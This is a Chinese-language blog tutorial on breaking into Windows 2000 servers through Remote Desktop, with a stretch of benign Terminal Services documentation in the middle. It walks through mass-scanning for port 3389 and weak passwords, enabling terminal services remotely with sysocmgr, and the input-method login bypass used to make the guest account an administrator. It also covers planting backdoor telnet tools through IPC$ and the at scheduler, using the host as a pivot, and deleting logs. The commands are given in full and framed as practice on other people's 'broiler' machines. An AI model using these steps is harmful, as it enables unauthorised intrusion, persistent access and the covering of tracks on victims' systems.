昨天我们讲到了提升权限的问题,好现在我们就来说一个简单的入侵,从3389找个肉鸡(没有肉鸡的话,对自己的技术提高是没好处的,不能老是看却不练啊,同学你说对吗?)
请各位注意,我这里并不是说什么烂鬼输入法漏洞。这种漏洞差不多已经绝迹了,太难找了,如果有人找到了,那恭喜你啦。众所周知,有开3389的一般都是服务器,也就是说有很大可能带局域网的,而内部入侵比外部要方便一点,这对大家是很好的,我想看我这个东西的很多都是学生吧(声明我就个学生哦)。如何能快速方便的得到开了终端的肉机呢?这需要用到两个工具,都是扫描工具来的,scanner3.0和焦点的xscan。打开scanner,输入一段IP,范围要大一点,scanner速度很快的。在“所有端口从”那里都填3389,点击“开始”就可以开工了。
很快的,扫描完成,结果出来了。点击右下脚的“删除”把多余的IP删了,只留下开了3389的IP。再点击“保存”,把结果保存到文件夹里。找到保存文件的目录,打开它。用记事本的替换功能把它保存为一个纯IP的TXT文件。“编辑-替换”在“查找内容”里输入要删除的垃圾,再点“全部替换”就行了。打开xscan,点击左边的蓝色按钮,进入“扫描板块”,只需在“SQL-Server弱口令”“NT-Server弱口令”前打钩,其他都清除掉。再点击右边的蓝色按钮,进入“扫描参数”,钩上“从文件获取主机列表”,打开刚才替换成纯IP的TXT文件,确定之后就可以扫描了。这时需要比较长的时间!(注意我是拿3.0为例的,其他的也差不多)。确定目标,用mstsc(登陆终端的工具,这个我不喜欢用,但确实很容易上手的)登陆对方主机后,打开对方cmd.exe,输入“net use”,先看看有没有人也在连接这部机(安全一点好,毕竟不是在学雷峰啊)。“net view”命令之后当出现一堆前面带//字符的就表示~~就表示什么呢??我想大家都非常明白吧!,如果不明白的话,我。。(也不知道怎么说了 )
想做个补充:
发现很多朋友对什么叫终端服务有点模糊,好,我们就详细说说 毕竟这个概念很重要的终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
终端服务可以在应用服务器模式或远程管理模式下在服务器上进行配置。作为应用服务器,终端服务提供了一种有效而可*的方式,通过网络服务器分发基于 Windows 的程序。在应用服务器模式下,终端服务为可能无法正常运行 Windows 的计算机显示 Windows 2000 的桌面以及目前基于 Windows 的大多数应用程序。在远程管理模式下使用时,终端服务提供了远程访问的能力,使您可以从网络上的任何地方虚拟地管理您的服务器。
终端服务有以下好处:
更快地显示 Windows 2000 的桌面。终端服务架设了一座从旧式桌面迁移到 Windows 2000 Professional 的桥梁,为非计算机桌面以及需要进行硬件升级才能在本地完全运行 Windows 2000 操作系统的计算机提供了一种虚拟的 Windows 2000 桌面环境。终端服务客户可用于多种不同的桌面平台,包括 MS-DOS、基于 Windows 的终端、Macintosh 和 UNIX。(与 MS-DOS、Macintosh 和基于 UNIX 的计算机的连接需要附加的软件)。
充分利用已有的硬件。终端服务扩展了分布式计算模型,允许计算机同时作为瘦客户机和具有完整功能的个人计算机操作。当计算机在现有的网络上时,可以继续使用,同时也可作为能仿真 Windows 2000 Professional 桌面的瘦客户机使用。
程序的集中配置。使用运行在 Windows 2000 Server 上的终端服务,所有程序的执行、数据的处理以及数据的存储都在服务器上进行,程序得以集中配置。终端服务可确保所有客户机都能访问当前版本的程序。软件只能在服务器上安装一次,而不能安装在您单位的每个桌面上,这样可减少单独更新计算机所花费的成本。
远程管理。终端服务提供了对 Windows 2000 Server 的远程管理,为系统管理员提供了从任何客户机通过广域网或拨号连接远程管理其服务器的一种方法。
功能:
易于使用
可管理性
安全性
易于使用
自动的本地打印机支持 Windows 2000 Server 终端服务可以添加并自动重新连接终端服务客户所连接的打印机。 提供对本地打印机的客户访问,剪贴板重定向 现在,用户可以在运行于本地计算机和终端服务器上的程序之间剪切和粘贴。 共享的剪贴板。性能增强 对缓存功能的增强,包括持久性缓存、数据包的利用和数据帧大小,明显地改进了终端服务的性能。 位图缓存漫游式断开连接支持 此功能使用户不用注销即可从会话中断开连接。在断开时会话仍可保持活动状态,这使得用户可以从另一台计算机中或在稍后某个时间重新连接到现有会话。重新连接需要登录,以便在任何时候都能保证每个会话的安全性。 注销或断开连接登录支持 用户可以登录到多个会话,同时从一个或多个客户机到多个 Windows 2000 Server,或者多次登录到一个服务器。这样,用户就可以同时执行多项任务或运行多个单独的桌面会话。 管理用户和客户机
可管理性
会话远程控制 支持者可查看或控制另一终端服务会话。键盘输入、鼠标移动以及图形显示可在两个终端服务会话之间共享,为支持者提供了诊断和解决配置问题以及远程培训用户的能力。此功能对于带有分支机构的单位特别有用。 远程控制网络负载平衡 网络负载平衡使终端服务客户可连接到运行终端服务的服务器组中最轻闲的成员。 网络负载平衡和终端服务。
基于 Windows 的终端 根据 Windows CE 操作系统和远程桌面协议 (RDP) 的自定义实现,不同的制造商可提供基于 Windows 的终端。
客户连接管理器 管理员和用户可以为一个程序或全部桌面访问建立到服务器的预定义连接。客户连接管理器在客户机桌面上创建图标,以便能通过一次单击连接到一个或多个终端服务器。想在计算环境中提供单个程序的管理员可以创建连接并将该连接与终端服务客户软件一同分发。 管理终端服务用户连接
终端服务授权 终端服务授权帮助系统管理员和采购部门跟踪客户机及其相关许可证。 授权终端服务分布式文件系统 (DFS) 支持 对分布式文件系统 (DFS) 的支持使用户可以连接到 DFS 共享位置,而且使管理员可以从终端服务器主控 DFS 共享。 分布式文件系统概述终端服务管理器 管理员可以使用终端服务管理器查询和管理 Windows 2000 Server 上的终端服务会话、用户和进程。 管理终端服务终端服务配置 终端服务连接配置可用于创建、修改和删除 Windows 2000 Server 上的一个或一组会话并访问服务器设置。 配置终端服务与 Windows 2000 Server“本地用户和组”以及“Active Directory 用户和计算机”的集成 管理员可以按照为 Windows 2000 Server 用户创建帐户的相同方式为终端服务用户创建帐户。另有一些字段可用来指定终端服务专用信息,如终端服务配置文件路径和主目录。 终端服务用户帐户与 Windows 2000 Server 系统监视器的集成 与 Windows 2000 Server 系统监视器的集成使管理员可以监视器终端服务系统性能,包括跟踪处理器的使用情况、内存分配和分页内存使用情况,并在每个用户的会话之间交换。 性能监视消息传递支持 管理员可以就一些重要的信息警告用户,如系统关机、升级或新程序。 使用终端服务管理器远程管理 具有管理级特权而且可访问终端服务管理级实用程序的任何用户都可以远程管理运行终端服务的服务器的各方面工作。
可配置的会话超时设置 管理员可以通过配置会话超时来减少服务器资源的使用。管理员可以指定活动会话的长度以及会话可在服务器上闲置多长时间 配置会话限制
安全性
加密 多级加密使管理员可以根据安全性需要在三种不同级别(低级、中级或高级)上加密在 Windows 2000 Server 和终端服务客户之间传输的所有或部分数据。另外,终端服务登录过程包括更改密码、桌面解锁以及屏幕保护功能解锁。登录过程是加密的,以确保用户名称和密码的安全传输。终端服务支持在服务器和客户机之间的 40 位和 128 位加密(128 位加密只能在美国和加拿大使用)。 确定加密的级别。
限制登录尝试和连接时间 管理员可以限制用户登录尝试次数,以防止有人未授权访问服务器。另外,个别用户或分组用户的连接时间可以进行限制。 配置终端服务终端服务配置概述。
终端服务连接提供了客户机可用于登录到服务器上某个会话的链接。TCP/IP 连接是当终端服务在 Windows 2000 Server 上启用时自动配置的。使用终端服务配置,您可以更改连接的默认属性或添加新连接。
终端服务配置
打开终端服务配置时,您将会看到已经配置的连接。这称为 RDP-TCP 连接。通常,这只是需要为使用终端服务器的客户配置的连接。对于终端服务器,只能为每个网卡配置一个 RDP(远程桌面协议)连接。如果要配置其他的 RDP 连接,您必须安装附加的网卡。
使用终端服务配置,您可以重新配置 RDP-TCP 连接的属性,包括限制客户机会话在服务器上保持活动状态的时间、设置加密的保护级别以及选择您希望用户和组具备的权限。某些连接属性也可以使用“本地用户和组”的终端服务扩展程序在每用户基础上配置。例如,当您使用“本地用户和组”的终端服务扩展程序时,可以为每个用户设置不同会话期限。使用终端服务配置,您可以只在每连接基础上设置会话期限,这意味着相同期限将应用于使用连接登录到服务器的所有用户。
除配置连接以外,您可以使用“终端服务配置”功能配置可应用于终端服务器的设置。包括临时文件夹的设置、默认连接安全性以及启用/禁用 Internet 连接器许可。详细信息,请参阅配置服务器设置。
基于 Citrix CA 的客户机终端服务配置还用于为基于 Citrix CA 的客户机配置连接。当 Citrix CA 协议和基于 Citrix CA 的客户软件添加到该系统时,可以使用 TCP/IP、同步、IPX/SPX 或 NetBIOS 传输协议配置这些连接有很多朋友问怎么开启3389终端服务下面我们一起来探索一下远程开启3389的方法. 首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在M$的大部分产品中都可运行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等。
但winnt4中是需要单独购买的,2000专业版不能远程安装终端服务的,至少我没成功过。我们在以下的探索中,是以win2000server和高级server为例的.(现在用的也最多)。现在开始. 假设我们拿到了一个主机的管理员帐户和密码
主机: 192.168.0.1
帐号: administrator
密码: 7788
2000系统安装在c:/winnt下,从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来,判断此主机是专业版还是服务器版,才能进入下一个环节. 我们可以先用对方所开帐户判断: c:/>letmein //192.168.0.1 -all -d
stating connecting to server …
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server…
————————–
Total = 5
————————–
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 来宾帐号 )
num3= IWAM_servername (启动 IIS 进程帐号)
num4= TsInternetUser (TsInternetUser)
————————–
Total = 5
————————– 一般情况num2/3/4这三个帐户都是2000server默认开启的.
2000专业版默认是不开这些帐户的. 我们也可以扫描对方开放的端口进一步确认:
用扫描软件如:superscan3.exe扫描对方所开端口判断对方是否开启25,3372等2000server默认开启的端口. 当然我们还可以使用一些工具,如:cmdinfo.zip。这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一。系列信息,一个图形界面,一个命令行。通过返回的信息就可以很清楚的了解对方主机情况. 还有一些其他的方法来判断,如:从对方所开的服务来确定等,
从上面的判断准确率还算高,别的就不一一说明了. 如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开, 或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了. 现在我们要进入下一环节:
判断终端服务到底有没有安装? 你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊
这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?
1.终端服务termservice在”管理工具”>>>”服务”中被禁用.
2.终端服务连接所需的RDP协议在”管理工具”>>>”终端服务配置”中被停用连接.
3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口
4.终端服务绑定的网络适配器不是外网的.
5.防火墙和端口过滤之类的问题.
6…..(还有我没想到的)
其实,我们遇到最多的情况就是以上5种情况. 现在开始判组件是否被安装. 先与远程主机连接,映射远程主机C盘为本地Z盘
net use z: //192.168.0.1/c$ “7788” /user:”administrator”
命令成功完成。 然后转到Z盘,检查
Z:/Documents and Settings/All Users/「开始」菜单/程序/管理工具>
里是否有 “终端服务管理器”和”终端服务配置”的快捷方式文件
如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小) 我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实. 判断完毕,对方好像是没有安装终端服务组件,可以进入
下一步: telnet登陆对方主机,准备安装服务组件. 在这里,我强烈建议使用2000自带的telnet服务端登陆,
有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!)
就算没有开,打开用完后再关掉就完了. .abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详, 而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实. 假如我们已开启对方23端口, telnet 192.168.0.1
输入用户名/密码
*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:/> //成功进入!!!! 进入后,再次检查终端组件是否安装:
c:/>query user 这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 运行中 . 2002-1-12 22:5 //类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了.
—————————————————
C:/>dir c:/sysoc.inf /s //检查INF文件的位置
c:/WINNT/inf 的目录 2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
—————————————————–
C:/> dir c:/sysocmgr.* /s //检查组件安装程序
c:/WINNT/system32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
—————————————————–
c:/>echo [Components] > c:/wawa
c:/>echo TSEnable = on >> c:/wawa
//这是建立无人参与的安装参数
c:/>type c:/wawa
[Components]
TSEnable = on
//检查参数文件
——————————————————
c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/wawa /q
—————————————————–
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起. 如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了. 问题和建议: A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒. B 一次不行可以再试一次,在实际中很有作用. C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议. 好了以后你就想干什么就干什么了。不过有时候还真不知道干什么,总之得干个事,装个什么局域网控制软件,不过不要体积太大,容易被发现。
超强 C 语言代码,你有信心看懂吗?
刚刚说有输入法漏洞的机子很少了,但有些朋友担心还有怎么办,不是吃大亏了吗?这样我找了一篇写的不错的文章贴一下( 注意是转载)写的不错,据说是新写的,这位大哥也真闲啊WIN2000中文简体版存在的输入法漏洞,可以使本地用户绕过身分验证机制进入系统内部。经实验,WIN2000中文简体版的终端服务,在远程操作时仍然存在这一漏洞,而且危害更大。
WIN2000的终端服务功能,能使系统管理员对WIN2000进行远程操作,采用的是图形界面,能使用户在远程控制计算机时功能与在本地使用一样,其默认端口为3389,用户只要装了WIN2000的客户端连接管理器就能与开启了该服务的计算机相联。因此这一漏洞使终端服务成为WIN2000的合法木马。
工具:客户端连接管理器,下载地址:自己找吧,天天有好几种呢。
入侵步骤:
一,获得管理员账号。
我们先对一个网段进行扫描,扫描端口设为3389,运行客户端连接管理器,将扫描到的任一地址加入到,设置好客户端连接管理器,然后与服务器连结。几秒钟后,屏幕上显示出WIN2000登录界面(如果发现是英文或繁体中文版,放弃,另换一个地址),用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条(如果没有出现,请耐心等待,因为对方的数据流传输还有一个过程)。用右键点击状态条上的微软徽标,弹出“帮助”(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞),打开“帮助”一栏中“操作指南”,在最上面的任务栏点击右键,会弹出一个菜单,打开“跳至URL”。此时将出现WIN2000的系统安装路径和要求我们填入的路径的空白栏。比如,该系统安装在C盘上,就在空白栏中填入”c:/winnt/system32″。然后按“确定”,于是我们就成功地绕过了身份验证,进入了系统的SYSTEM32目录。
现在我们要获得一个账号,成为系统的合法用户。在该目录下找到”net.exe”,为”net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性”->“目标”->c:/winnt/system32/net.exe后面空一格,填入”user guest /active :yes”点“确定”。这一步骤目的在于用net.exe激活被禁止使用的guest账户,当然也可以利用”user 用户名 密码/add”,创建一个新账号,但容易引起网管怀疑。运行该快捷方式,此时你不会看到运行状态,但guest用户已被激活。然后又修改该快捷方式,填入”user guest 密码”,运行,于是guest便有了密码。最后,再次修改,填入“localgroup administrators guest /add,将guest变成系统管理员。
注意事项:
1、在这过程中,如果对方管理员正在使用终端服务管理器,他将看到你所打开的进程id,你的ip和机器名,甚至能够给你发送消息。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间,在这一分钟内如果你不能完成上述操作,你只能再连结。
3、你所看到的图像与操作会有所延迟,这受网速的影响。
二,创建跳板。
再次登录终端用务器,以”guest”身份进入,此时guest已是系统管理员,已具备一切可执行权。打开“控制面板”,进入“网络和拔号连接”,在“本地连接”或“拔号连接”中查看属性,看对方是否选择“Microsoft 网络的文件和打印机共享”,如果没有,就打上勾。对方如果使用的是拔号上网,下次拔号网络共享才会打开。
退出对方系统,在本地机命令提示符下,输入 net use //IP Address/IPC$ [“password”] /user:”guset”,通过IPC的远程登陆就成功了。
登陆成功之后先复制一个Telnet的程序上去(小榕流光安装目录下的Tools目录里的Srv.exe,另外,还有ntml.xex,一会要用),这个程序是在对方上面开一个Telnet服务,端口是99。
copy c:/hack/srv.exe //***.***.***.***/admin$
然后利用定时服务启动它,先了解对方的时间:
net time //***.***.***.***
显示:
//***.***.***.*** 的当前时间是 2001/1/8 下午 08:55
命令成功完成。
然后启动srv.exe:
at //***.***.***.*** 09:00 srv.exe
显示:
新加了一项作业,其作业 ID = 0
过几分钟后,telnet ***.***.***.*** 99
这里不需要验证身份,直接登录,显示:
c:/winnt:/system32>
我们就成功登陆上去了。然后又在本地打开命令提示符,另开一个窗口,输入:
copy c:/hack/ntlm.exe //211.21.193.202/admin$
把事先存放在hack目录里的ntlm.exe拷过去。然后又回到刚才的telnet窗口,运行ntlm.exe
C:/WINNT/system32>ntlm
显示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:/WINNT/system32>
C:/WINNT/system32>
好,现在我们来启动WIN2000本身的telnet,首先终止srv.exe的telnet服务:
net stop telnet 系统告诉你并没有启动telnet,不理它,继续:
net start telnet 这次真的启动了telnet,我们可以在另开的命令提示符窗口telnet到对方的
23端口,验证身份,输入我们的guest账号和密码,它就真正成为我们的跳板了。我们可以利用它到其它的主机去。
三、扫除脚印:
删除为net.exe 创建的快捷方式,删除winnt/system32/logfiles下边的日志文件
原创文章,作者:奋斗,如若转载,请注明出处:https://blog.ytso.com/55005.html